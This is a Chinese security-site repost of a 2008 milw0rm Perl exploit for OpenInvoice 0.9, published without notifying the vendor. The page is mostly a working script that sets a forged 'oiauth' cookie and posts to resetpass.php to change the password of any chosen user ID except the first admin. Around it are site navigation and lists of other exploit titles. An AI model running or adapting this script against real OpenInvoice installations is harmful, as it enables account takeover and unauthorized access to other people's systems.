首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenInvoice 0.9 Arbitrary Change User Password Exploit
来源:milw0rm.com 作者:t0pP8uZz 发布时间:2008-04-21  
#!/usr/bin/perl

# [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ]
# Discovered && Coded By t0pP8uZz
# Discovered On: 18 April 2008
# Vendor has not been notified!

# see exploit for more details..

# Greetz: milw0rm.com, h4ck-y0u.org, CipherCrew!

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";
print "-+-             (Discovered && Coded By t0pP8uZz)              -+-\n";
print "-+-                                                            -+-\n";
print "-+-   Discovered On: 18 April 2008 / Discovered By: t0pP8uZz   -+-\n";
print "-+- OpenInvoice 0.9 beta (and prior) Suffers from Insecure ... -+-\n";
print "-+- ...cookies and admin panel validating, combining the two.. -+-\n";
print "-+- .we can change any users password except for the 1st admin -+-\n";
print "-+-                                                            -+-\n";
print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";

print "\nEnter URL (the vuln site): ";
	chomp(my $url=<STDIN>);
	
print "\nEnter UID (the user id to change pass for): ";
	chomp(my $uid=<STDIN>);
	
my $domain = $url;
my $count = ($domain =~ tr"/"");

if($count == 1) {
	$domain =~ s/\\//;
} elsif($count >= 3) {
	$domain =~ s/http:\/\///;
}

my $cjar = HTTP::Cookies->new( file => "cookies.txt", autosave => 1 );
$cjar->set_cookie(1, "oiauth", "1", "/", "6oogle.pl");
$cjar->save("cookies.txt");

my $ua     = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 )', cookie_jar => $cjar );
my $result = $ua->post($url."/resetpass.php", { 'uid' => $uid, 'changepass' => 'Change Password' } );

if($result->is_success() && $result->content !~ /unable to change password/i && $uid != 1) {
	print "Password successfuly changed for userid: ".$uid."\n";
	exit;
}
print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1\n";
exit;

# milw0rm.com [2008-04-18]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DivX Player 6.6.0 SRT File SEH
·PHP-Fusion 6.00.307 Remote Bli
·Intel Centrino ipw2200BG Wirel
·SubEdit Player build 4066 subt
·BS.Player 2.27 Build 959 SRT F
·Adobe Album Starter 3.2 Unchec
·Microsoft Works 7 WkImgSrv.dll
·RedDot CMS 7.5 (LngId) Remote
·MS08-025 win32k.sys NtUserFnOU
·Web Calendar <= 4.1 Blind SQL
·MS08-025 win32k.sys NtUserFnOU
·Zune Software ActiveX Arbitrar
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved